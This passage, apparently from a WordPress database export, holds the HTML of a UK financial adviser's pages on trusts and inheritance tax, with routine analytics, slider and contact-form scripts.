helping you protect, what you could easily lose <br /><br /><a href=\"../discretionary-\">Discretionary Trusts</a><br />&#13;\n     the trustees have \'discretion\' about how to use the income received by the trust<br /><br /><a href=\"../absolute-trust/\">Absolute Trusts</a><br />&#13;\n     a trust for when you are certain about who you wish to benefit<br /><br /><a href=\"../gift-loan-schemes/\">Gift &amp; Loan Schemes</a><br />&#13;\n     find out how to reduce your Inheritance Tax liability<br /><br /><a href=\"../wills-trust/\">Wills &amp; Trust</a><br />&#13;\n     remain an important estate planning mechanism for us all </td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"154\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td rowspan=\"5\" valign=\"top\"> </td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"71\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td><img src=\"../images/spacer.gif\" width=\"1\" height=\"108\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td><img src=\"../images/spacer.gif\" width=\"1\" height=\"24\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td><img src=\"../images/spacer.gif\" width=\"1\" height=\"58\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"3\" valign=\"top\"> </td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"24\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"17\"><img name=\"investments_r14_c1\" src=\"../images/investments_r14_c1.jpg\" width=\"950\" height=\"8\" border=\"0\" id=\"investments_r14_c1\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"8\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td rowspan=\"2\"><img name=\"investments_r15_c1\" src=\"../images/investments_r15_c1.jpg\" width=\"10\" height=\"245\" border=\"0\" id=\"investments_r15_c1\" alt=\"\" /></td>&#13;\n   <td rowspan=\"2\"><img name=\"investments_r15_c2\" src=\"../images/investments_r15_c2.jpg\" width=\"18\" height=\"245\" border=\"0\" id=\"investments_r15_c2\" alt=\"\" /></td>&#13;\n   <td colspan=\"10\"><div class=\"moreinfo\">more information on Trusts and Protection...</div></td>&#13;\n   <td rowspan=\"2\"><img name=\"investments_r15_c13\" src=\"../images/investments_r15_c13.jpg\" width=\"11\" height=\"245\" border=\"0\" id=\"investments_r15_c13\" alt=\"\" /></td>&#13;\n   <td colspan=\"3\"><div class=\"moreinfo\">Contact Us for Advice</div></td>&#13;\n   <td rowspan=\"2\"><img name=\"investments_r15_c17\" src=\"../images/investments_r15_c17.jpg\" width=\"19\" height=\"245\" border=\"0\" id=\"investments_r15_c17\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"54\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"10\" valign=\"top\"><div class=\"paracontent2\">&#13;\n     <p>A person’s gift to a bare trust is a Potentially  Exempt Transfer, or PET. This is outside the estate of the settler should the  settler survive for seven years from the date the gift was given. If, however,  the settler dies within this timeframe, the Potentially Exempt Transfer will  fail.</p>&#13;\n     <p> A gift given to a Discretionary trust is considered to be a Chargeable Lifetime  Transfer, or CLT. This is subject to Inheritance Tax at the rate of 20% on the  gift’s net value if it is over and above the balance of the settlor’s nil rate  band, allowing for any cumulative chargeable transfers in the seven years previous.</p>&#13;\n     <p> The value of a gift is considered to be outside of the settlor’s estate should  they survive for seven years after the gift has been given. If, however, they  die within the seven years, a further inheritance tax charge becomes payable on  the original net value of the gift at a rate of 20%.</p>&#13;\n     <p> As we can see, if a PET or CLT is being made, great care should be taken to  ensure that the timing ensures maximum tax efficiency.</p>&#13;\n     <p> Discretionary trusts are liable to a tax charge on the value of their assets,  every ten years over the nil rate band on the date of the tenth anniversary  (this also includes previous distributions). All distributions from these  trusts are likely to incur a tax charge; however, with the correct advice and  planning, these can often be avoided.</p>&#13;\n     <p> <img src=\"../images/business-case.jpg\" alt=\"Business Case\" width=\"237\" height=\"143\" align=\"left\" style=\"padding:7px\" />Any income which is received by a trust becomes liable for income tax, and any  gains within a trust are liable for capital gains tax. </p>&#13;\n     <p>However, by carefully  selecting the assets which are held in a trust, these taxes can often be  avoided. </p>&#13;\n     <p> </p>&#13;\n   </div></td>&#13;\n   <td colspan=\"3\" valign=\"top\"><div class=\"form\" id=\"form\" style=\"width:310; height:365px; text-align: right; font-size:12px; color:#600000; font-weight:bold; margin-left:11px\"> &#13;\n  <form action=\"../thank-you/\" method=\"post\" name=\"form\" id=\"form\" onsubmit=\"MM_validateForm(\'name\',\'\',\'R\',\'surname\',\'\',\'R\',\'telephone\',\'\',\'NisNum\');return document.MM_returnValue\"><table width=\"280\" border=\"0\" align=\"right\" cellpadding=\"1\" cellspacing=\"4\"><tr><td width=\"117\" style=\"text-align: left\">First name:&#13;\n        <input name=\"name\" type=\"text\" id=\"name\" size=\"15\" style=\"border-color:#999; border-width:thin; border-style:solid;\" /></td>&#13;\n      <td width=\"168\" style=\"text-align: left\">Surname:&#13;\n        <br /><input name=\"surname\" type=\"text\" id=\"surname\" size=\"17\" style=\"border-color:#999; border-width:thin; border-style:solid;\" /></td>&#13;\n    </tr><tr><td style=\"text-align: left\"> Email:<br /><input name=\"email\" type=\"text\" id=\"email\" size=\"15\" style=\"border-color:#999; border-width:thin; border-style:solid;\" /></td>&#13;\n      <td style=\"text-align: left\">Daytime Tel:&#13;\n        <input name=\"telephone\" type=\"text\" id=\"telephone\" size=\"17\" style=\"border-color:#999; border-width:thin; border-style:solid;\" /></td>&#13;\n    </tr><tr><td style=\"text-align: left\">Evening Tel:&#13;\n        <input name=\"telephone2\" type=\"text\" id=\"telephone2\" size=\"15\" style=\"border-color:#999; border-width:thin; border-style:solid;\" /></td>&#13;\n      <td style=\"text-align: left\">Postcode:<br /><input name=\"postcode\" type=\"text\" id=\"postcode\" size=\"17\" style=\"border-color:#999; border-width:thin; border-style:solid;\" /></td>&#13;\n    </tr><tr><td style=\"text-align: left\">Date of Birth:&#13;\n        <input name=\"dob\" type=\"text\" id=\"dob\" style=\"border-color:#999; border-width:thin; border-style:solid;\" value=\"dd/mm/yy\" size=\"15\" /></td>&#13;\n      <td style=\"text-align: left\">Intestested In?<br /><select name=\"interested\" id=\"interested\" style=\"border-color:#999; border-width:thin; border-style:solid;\"><option value=\"--\" selected=\"selected\">--</option><option value=\"asset\">Asset Trust</option><option value=\"discretionery\">Discretionery</option><option value=\"absolute\">Absolute Trust</option><option value=\"business\">Business Protection</option><option value=\"wills\">Wills and Trust</option></select></td>&#13;\n    </tr><tr><td style=\"text-align: left\"></td>&#13;\n      <td style=\"text-align: left\"><label>&#13;\n        <input name=\"submit\" type=\"image\" id=\"submit\" value=\"Submit\" src=\"../images/submit.jpg\" alt=\"Savings &amp; Investments\" align=\"right\" /></label> </td>&#13;\n    </tr><tr><td colspan=\"2\" style=\"text-align: left\"> </td>&#13;\n    </tr><tr><td colspan=\"2\" style=\"text-align: left\"><div style=\"border-style:dotted; border-width:thin; border-color:#999; padding:5px; font-weight:normal\">Note: The Financial Services Authority does not regulate some forms of tax advice, trusts &amp; wills</div></td>&#13;\n      </tr></table><br /></form></div></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"191\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"17\"><img name=\"investments_r17_c1\" src=\"../images/investments_r17_c1.jpg\" width=\"950\" height=\"6\" border=\"0\" id=\"investments_r17_c1\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"6\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"17\" valign=\"top\" style=\"background-image:url(../images/index_r16_c1.jpg); background-repeat:no-repeat; color:#333;\"><div class=\"footerlinks\"><a href=\"../site-map/\">sitemap</a> - <a href=\"../privacy-policy/\">privacy policy</a> - <a href=\"/\">testimonials</a></div><div class=\"footertext\"><br /></div></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"75\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr></table></div>&#13;\n<script type=\"text/javascript\"><![CDATA[\r\nvar gaJsHost = ((\"https:\" == document.location.protocol) ? \"https://ssl.\" : \"http://www.\");\r\ndocument.write(unescape(\"%3Cscript src=\'\" + gaJsHost + \"google-analytics.com/ga.js\' type=\'text/javascript\'%3E%3C/script%3E\"));\r\n]]></script><script type=\"text/javascript\"><![CDATA[\r\ntry {\r\nvar pageTracker = _gat._getTracker(\"UA-10958181-3\");\r\npageTracker._trackPageview();\r\n} catch(err) {}]]></script><script type=\"text/javascript\"><![CDATA[\r\n   var adiInit =\"488\";\r\n   (function() {\r\n      var adiSrc = document.createElement(\"script\"); adiSrc.type = \"text/javascript\";\r\n      adiSrc.async = true;\r\n      adiSrc.src = (\"https:\" == document.location.protocol ? \"https://\" : \"http://\") + \"static.adinsight.eu/static/scripts/adiTrack.min.js\";\r\n      var s = document.getElementsByTagName(\"script\")[0];\r\n      s.parentNode.insertBefore(adiSrc, s);\r\n   })();\r\n]]></script></body>','Trusts &amp; Protection - UK Guide to Trusts &amp; Protections','With so many options available in Trust and Protections, let Reid, Scott and Ross advise you on how best to invest.','publish','closed','closed','','trusts-protection-uk-guide-to-trusts-protections','','','2017-09-21 16:34:41','2017-09-21 16:34:41','',0,'http://www.equalitywalk.org.uk/trusts-protection-uk-guide-to-trusts-protections',0,'page','',0),(111,1,'2017-09-21 16:34:42','2017-09-21 16:34:42','<body class=\"page page-id-30 page-parent page-template page-template-full-width-php light  wpb-js-composer js-comp-ver-3.5.4 vc_responsive\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n					<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v2\">&#13;\n		<div class=\"header-social\">&#13;\n		<div class=\"avada-row\">&#13;\n			&#13;\n			<div class=\"alignright\">&#13;\n				<div class=\"top-menu\">&#13;\n	<ul id=\"snav\" class=\"menu\"><li id=\"menu-item-4739\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4739\"><a href=\"/\">Home</a></li>&#13;\n<li id=\"menu-item-4811\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-4811\"><a href=\"../about-us/\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-5319\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-5319\"><a href=\"../our-team/\">Our Team</a></li>&#13;\n	<li id=\"menu-item-6369\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6369\"><a href=\"../about-us/testimonials/\">Testimonials</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-6489\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6489\"><a href=\"../resources/\">Resources</a></li>&#13;\n<li id=\"menu-item-5417\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-5417\"><a href=\"../our-blog/\">Blog</a></li>&#13;\n<li id=\"menu-item-6142\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-6142\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n<li id=\"menu-item-4746\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-4746\"><a href=\"../contact-us/\">Contact</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-6358\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6358\"><a href=\"../terms-of-use/\">Terms Of Use</a></li>&#13;\n	<li id=\"menu-item-6359\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6359\"><a href=\"../privacy-policy/\">Privacy Policy</a></li>&#13;\n	<li id=\"menu-item-6357\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6357\"><a href=\"../cookies/\">Cookies</a></li>&#13;\n</ul></li>&#13;\n			</ul></div>			</div>&#13;\n		</div>&#13;\n	</div>&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul id=\"nav\" class=\"menu\"><li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214\"><a href=\"../wealth-management/\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44\"><a href=\"../wealth-platform/\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-27\"><a href=\"../pensions/\">Pensions</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"../pensions/pension-release/\">Pension Release</a></li>&#13;\n	<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"../pensions/pension-transfer/\">Pension Transfer</a></li>&#13;\n	<li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-136\"><a href=\"../pensions/auto-enrolment-pensions/\">Auto Enrolment Pensions</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"../auto-enrolment-report/\">Auto Enrolment Report</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"../pension-review/\">Pension Review</a></li>&#13;\n	<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"../pensions/sipps/\">SIPPS</a></li>&#13;\n	<li id=\"menu-item-105\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-105\"><a href=\"../pensions/stakeholder-pensions/\">Stakeholder Pensions</a></li>&#13;\n	<li id=\"menu-item-127\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-127\"><a href=\"../pensions/occupational-pensions/\">Occupational Pensions</a></li>&#13;\n	<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"../pensions/group-pension-plan/\">Group Pension Plan</a></li>&#13;\n	<li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"../pensions/income-drawdown/\">Income Drawdown</a></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852\"><a>More Information</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"../tracking-down-your-lost-pension/\">Lost Pension</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-47\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-47\"><a href=\"..\">Investments</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-121\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-121\"><a href=\"..isas/\">ISAs</a></li>&#13;\n	<li id=\"menu-item-118\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-118\"><a href=\"..lump-sum-investment/\">Lump Sum Investment</a></li>&#13;\n	<li id=\"menu-item-102\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-102\"><a href=\"..offshore-bonds/\">Offshore Bonds</a></li>&#13;\n	<li id=\"menu-item-124\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-124\"><a href=\"..unit-trusts-oeics/\">Unit Trusts &amp; OEICs</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-46\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-menu-item page_item page-item-30 current_page_item menu-item-has-children menu-item-46\"><a href=\"../\">Trusts</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-108\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-108\"><a href=\"../asset-protection-trust/\">Asset Protection Trust</a></li>&#13;\n	<li id=\"menu-item-114\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-114\"><a href=\"../discretionary-\">Discretionary Trusts</a></li>&#13;\n	<li id=\"menu-item-115\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-115\"><a href=\"../absolute-\">Absolute Trusts</a></li>&#13;\n	<li id=\"menu-item-143\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-143\"><a href=\"../gift-loan-schemes/\">Gift &amp; Loan Trust</a></li>&#13;\n	<li id=\"menu-item-146\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-146\"><a href=\"../wills-and-trust/\">Wills and Trust</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-3381\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-3381\"><a href=\"../insurance-protection/\">Insurance</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-3535\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3535\"><a href=\"../critical-illness-insurance-2-0/\">Critical Illness</a></li>&#13;\n	<li id=\"menu-item-3585\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3585\"><a href=\"../serious-illness-cover/\">Serious Illness</a></li>&#13;\n	<li id=\"menu-item-4633\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4633\"><a href=\"../relevant-life-plan/\">Relevant Life Plan</a></li>&#13;\n	<li id=\"menu-item-7228\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7228\"><a href=\"../life-insurance/\">Life Insurance</a></li>&#13;\n	<li id=\"menu-item-7243\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7243\"><a href=\"../business-protection-insurance/\">Business Protection</a></li>&#13;\n</ul></li>&#13;\n		</ul></nav></div>&#13;\n	</header></div>		</div>&#13;\n				<div id=\"sliders-container\">&#13;\n									&#13;\n				<!-- START REVOLUTION SLIDER 3.0.95 fullwidth mode -->&#13;\n				&#13;\n								&#13;\n								<div id=\"rev_slider_30_1_wrapper\" class=\"rev_slider_wrapper fullwidthbanner-container\" style=\"margin:0px auto;background-color:#E9E9E9;padding:0px;margin-top:0px;margin-bottom:0px;max-height:375px;\">&#13;\n					<div id=\"rev_slider_30_1\" class=\"rev_slider fullwidthabanner\" style=\"display:none;max-height:375px;height:375;\">						&#13;\n										<ul><li data-transition=\"random\" data-slotamount=\"7\" data-masterspeed=\"300\">&#13;\n						&#13;\n														<div class=\"tp-caption large_text fade\" data-x=\"50\" data-y=\"39\" data-speed=\"1000\" data-start=\"0\" data-easing=\"easeOutExpo\">Trusts &amp; Asset Protection					 					 </div>&#13;\n				&#13;\n								<div class=\"tp-caption small_text fade\" data-x=\"56\" data-y=\"82\" data-speed=\"1000\" data-start=\"0\" data-easing=\"easeOutExpo\">We give you more certainty in an uncertain world by<br/> helping you build a more secure environment for<br/> your assets, through the establishment of Trusts,<br/>and advice on the mitigation of inheritance tax (IHT) 					 					 </div>&#13;\n				&#13;\n								<div class=\"tp-caption alt1 sfb\" data-x=\"55\" data-y=\"179\" data-speed=\"1000\" data-start=\"0\" data-easing=\"easeOutExpo\"><a href=\"../contact-us/\" class=\"button large green\">Get Expert Advice</a>					 					 </div>&#13;\n				&#13;\n									</li>&#13;\n								</ul><div class=\"tp-bannertimer\"/>					</div>&#13;\n				</div>				&#13;\n							&#13;\n			<script type=\"text/javascript\"><![CDATA[\r\n\r\n				var tpj=jQuery;\r\n				\r\n									tpj.noConflict();\r\n								\r\n				var revapi30;\r\n				\r\n				tpj(document).ready(function() {\r\n				\r\n				if (tpj.fn.cssOriginal != undefined)\r\n					tpj.fn.css = tpj.fn.cssOriginal;\r\n				\r\n				if(tpj(\'#rev_slider_30_1\').revolution == undefined)\r\n					revslider_showDoubleJqueryError(\'#rev_slider_30_1\');\r\n				else\r\n				   revapi30 = tpj(\'#rev_slider_30_1\').show().revolution(\r\n					{\r\n						delay:9000,\r\n						startwidth:1000,\r\n						startheight:375,\r\n						hideThumbs:200,\r\n						\r\n						thumbWidth:100,\r\n						thumbHeight:50,\r\n						thumbAmount:1,\r\n						\r\n						navigationType:\"bullet\",\r\n						navigationArrows:\"solo\",\r\n						navigationStyle:\"round\",\r\n						\r\n						touchenabled:\"on\",\r\n						onHoverStop:\"on\",\r\n						\r\n						navigationHAlign:\"center\",\r\n						navigationVAlign:\"bottom\",\r\n						navigationHOffset:0,\r\n						navigationVOffset:20,\r\n\r\n						soloArrowLeftHalign:\"left\",\r\n						soloArrowLeftValign:\"center\",\r\n						soloArrowLeftHOffset:20,\r\n						soloArrowLeftVOffset:0,\r\n\r\n						soloArrowRightHalign:\"right\",\r\n						soloArrowRightValign:\"center\",\r\n						soloArrowRightHOffset:20,\r\n						soloArrowRightVOffset:0,\r\n								\r\n						shadow:0,\r\n						fullWidth:\"on\",\r\n						fullScreen:\"off\",\r\n\r\n						stopLoop:\"off\",\r\n						stopAfterLoops:-1,\r\n						stopAtSlide:-1,\r\n\r\n						shuffle:\"off\",\r\n						\r\n						hideSliderAtLimit:0,\r\n						hideCaptionAtLimit:0,\r\n						hideAllCaptionAtLilmit:0,\r\n						startWithSlide:0,\r\n						videoJsPath:\"http://www.equalitywalk.org.uk/wp-content/plugins/revslider/rs-plugin/videojs/\",\r\n						fullScreenOffsetContainer: \"\"	\r\n					});\r\n				\r\n				});	//ready\r\n				\r\n			]]></script><!-- END REVOLUTION SLIDER --></div>&#13;\n																<div id=\"main\" class=\"\" style=\"overflow:hidden !important;\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n				<div id=\"content\" class=\"full-width\">&#13;\n				<div id=\"post-30\" class=\"post-30 page type-page status-publish hentry\">&#13;\n			<span class=\"entry-title\" style=\"display: none;\">Trusts</span>&#13;\n			<span class=\"updated\" style=\"display: none;\">June 12th, 2017</span>&#13;\n			<span class=\"vcard\" style=\"display: none;\"><span class=\"fn\"><a href=\"../author/rs-r-admin/\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></span></span>&#13;\n						<div class=\"post-content\">&#13;\n				<h2 style=\"text-align: center;\"/>&#13;\n<div class=\"demo-sep sep-double\" style=\"margin-top:40px;margin-bottom:40px\"/>&#13;\n<style type=\"text/css\"><![CDATA[\r\n		#content-boxes-1 article.col{background-color:#f4f4f4 !important;}\r\n		#content-boxes-1 .fontawesome-icon.circle-yes{color:#ffffff !important;background-color:#afd9a5 !important;border:1px solid #afd9a5 !important;}\r\n		]]></style><section class=\"clearfix columns content-boxes content-boxes-icon-boxed columns-4\" id=\"content-boxes-1\"><article class=\"col\"><div class=\"heading heading-and-icon\"><i class=\"fontawesome-icon medium circle-yes icon-home\"/><h2>Book A Trust Review</h2></div><div class=\"col-content-container \">Trust Protection planning involves making prudent decisions today to protect yourself, your business and hard earned assets from loss due to downturn or disaster. We can review your current trusts and provide advice.<span class=\"more\"><a href=\"#standard\" target=\"\">Book A Review</a></span></div></article><article class=\"col\"><div class=\"heading heading-and-icon\"><i class=\"fontawesome-icon medium circle-yes icon-money\"/><h2>Asset Protection Trust</h2></div><div class=\"col-content-container \">If the time comes when you do need to go into care, you may find that the assets like your home that’s taken a lifetime to accumulate, can be used for the cost of care rather than going directly to your beneficiaries.<span class=\"more\"><a href=\"../asset-protection-trust/\" target=\"\">Learn More</a></span></div></article><article class=\"col\"><div class=\"heading heading-and-icon\"><i class=\"fontawesome-icon medium circle-yes icon-thumbs-up\"/><h2>Discretionary Trust</h2></div><div class=\"col-content-container \">Discretionary trusts commit the trustee, whether that should be a company or an individual, to handle the assets of a deceased person for the benefit of the beneficiaries.<span class=\"more\"><a href=\"../discretionary-\" target=\"\">Learn More</a></span></div></article><article class=\"col last\"><div class=\"heading heading-and-icon\"><i class=\"fontawesome-icon medium circle-yes icon-lock\"/><h2>Gift &amp; Loan Trust</h2></div><div class=\"col-content-container \">A Gift and Loan Trust, which are also known as Loan Schemes, are a popular way of reducing your Inheritance Tax liability without losing access to the capital.<span class=\"more\"><a href=\"../gift-loan-schemes/\" target=\"\">Learn More</a></span></div></article></section><style type=\"text/css\"><![CDATA[#reading-box-container-1 .tagline-shadow:before,#reading-box-container-1 .tagline-shadow:after{opacity:0.7;}]]></style><div class=\"reading-box-container clearfix\" id=\"reading-box-container-1\"><section class=\"reading-box tagline-shadow\" style=\"background-color:#f4f4f4 !important;border-width:1px;border-color:#fafafa!important;border-top-width:3px !important;border-top-color:#afd9a5!important;border-style:solid;\"><a href=\"#standard\" target=\"\" class=\"continue button large default\">Contact Us Today</a><h2>It’s all so simple. To book a chat with our independent financial advisors.</h2><p>It\'s free, without obligation and impartial click the link or call free on .</p><a href=\"#standard\" target=\"\" class=\"continue mobile-button button large default\">Contact Us Today</a></section></div><a id=\"iphorm_fancybox_53004a3f71dad\" class=\"iphorm-fancybox-link iphorm-fancybox-link-1\" href=\"#\"/>&#13;\n<script type=\"text/javascript\"><![CDATA[\r\n<!--\r\n    jQuery(document).ready(function ($) {\r\n        var $link = $(\'#iphorm_fancybox_53004a3f71dad\');\r\n        if ($.isFunction($.fn.fancybox) && !$link.data(\'iphorm-initialised\')) {\r\n            $link.fancybox($.extend({\r\n                inline: true,\r\n                href: \'#iphorm-outer-53004a3f4eb22\',\r\n                onStart: function () {\r\n                    $(\'#fancybox-outer\').css(\'opacity\', 0);\r\n                },\r\n                onComplete: function () {\r\n                    $(\'#fancybox-wrap, #fancybox-content\').css({width: \'auto\'});\r\n                    $.fancybox.center(0);\r\n                    setTimeout(function () {\r\n                        $(\'#fancybox-outer\').animate({opacity: 1}, 400);\r\n                        $(\'#fancybox-overlay\').css({height: $(document).height()});\r\n                    }, 1);\r\n                }\r\n            }, {})).data(\'iphorm-initialised\', true);\r\n        }\r\n    });\r\n//-->\r\n]]></script><div style=\"display: none;\">&#13;\n<div id=\"iphorm-outer-53004a3f4eb22\" class=\"iphorm-outer iphorm-outer-1 iphorm-uniform-theme-default iphorm-theme-light-rounded\">&#13;\n    <script type=\"text/javascript\"><![CDATA[\r\n	<!--\r\n		    jQuery(document).ready(function($) {\r\n			\r\n        	$(\'#iphorm-53004a3f4eb22\').iPhorm({\"id\":1,\"uniqueId\":\"53004a3f4eb22\",\"PHPSESSID\":\"3f78999928bf9020d9baf7548ff053e4\",\"useAjax\":true,\"successMessageTimeout\":10,\"clElementIds\":[],\"clDependentElementIds\":[],\"centerFancybox\":true,\"centerFancyboxSpeed\":true});\r\n\r\n	        	        if ($.isFunction($.fn.qtip)) {\r\n	            $(\'.iphorm-tooltip-hover\', iPhorm.instance.$form).qtip({\r\n	                style: {\r\n	                    classes: \'qtip-plain qtip-shadow\'\r\n	                },\r\n	                position: {\r\n	                    my: \'left center\',\r\n	                    at: \'right center\'\r\n	                }\r\n	            });\r\n	            $(\'.iphorm-tooltip-click\', iPhorm.instance.$form).qtip({\r\n	                style: {\r\n	                    classes: \'qtip-plain qtip-shadow\'\r\n	                },\r\n	                position: {\r\n	                    my: \'left center\',\r\n	                    at: \'right center\'\r\n	                },\r\n	                show: {\r\n	                    event: \'focus\'\r\n	                },\r\n	                hide: {\r\n	                    event: \'unfocus\'\r\n	                }\r\n	            });\r\n	            $(\'.iphorm-tooltip-icon-hover\', iPhorm.instance.$form).qtip({\r\n	                style: {\r\n	                    classes: \'qtip-plain qtip-shadow\'\r\n	                },\r\n	                position: {\r\n	                    my: \'left center\',\r\n	                    at: \'right center\'\r\n	                },\r\n	                content: {\r\n	                    text: function (api) {\r\n	                        return $(this).find(\'.iphorm-tooltip-icon-content\')();\r\n	                    }\r\n	                }\r\n	            });\r\n	            $(\'.iphorm-tooltip-icon-click\', iPhorm.instance.$form).qtip({\r\n	                style: {\r\n	                    classes: \'qtip-plain qtip-shadow\'\r\n	                },\r\n	                position: {\r\n	                    my: \'left center\',\r\n	                    at: \'right center\'\r\n	                },\r\n	                show: {\r\n	                    event: \'click\'\r\n	                },\r\n	                hide: {\r\n	                    event: \'unfocus\'\r\n	                },\r\n	                content: {\r\n	                    text: function (api) {\r\n	                        return $(this).find(\'.iphorm-tooltip-icon-content\')();\r\n	                    }\r\n	                }\r\n	            });\r\n	            $(\'.iphorm-labels-inside > .iphorm-element-spacer > label\').hover(function () {\r\n	                $(this).siblings(\'.iphorm-input-wrap\').find(\'.iphorm-tooltip-hover\').qtip(\'show\');\r\n	            }, function () {\r\n	            	$(this).siblings(\'.iphorm-input-wrap\').find(\'.iphorm-tooltip-hover\').qtip(\'hide\');\r\n	            });\r\n	        }\r\n	        \r\n	        	        if ($.isFunction($.fn.uniform)) {\r\n	            $(\'select, input:checkbox, input:radio\', iPhorm.instance.$form).uniform({context: iPhorm.instance.$form, selectAutoWidth: false});\r\n	        }\r\n	        \r\n	        if ($.isFunction($.fn.inFieldLabels)) {\r\n	            $(\'.iphorm-labels-inside:not(.iphorm-element-wrap-recaptcha) > .iphorm-element-spacer > label\', iPhorm.instance.$form).inFieldLabels();\r\n	        }\r\n\r\n	        \r\n	        $(\'.iphorm-group-row > div:last-child:not(:first-child)\', iPhorm.instance.$form).add(\'.iphorm-group-row:last-child\', iPhorm.instance.$form).addClass(\'last-child\');\r\n\r\n	        	    }); // end document.ready()\r\n	//-->\r\n	]]></script><form id=\"iphorm-53004a3f4eb22\" class=\"iphorm iphorm-form-1\" action=\"../\" 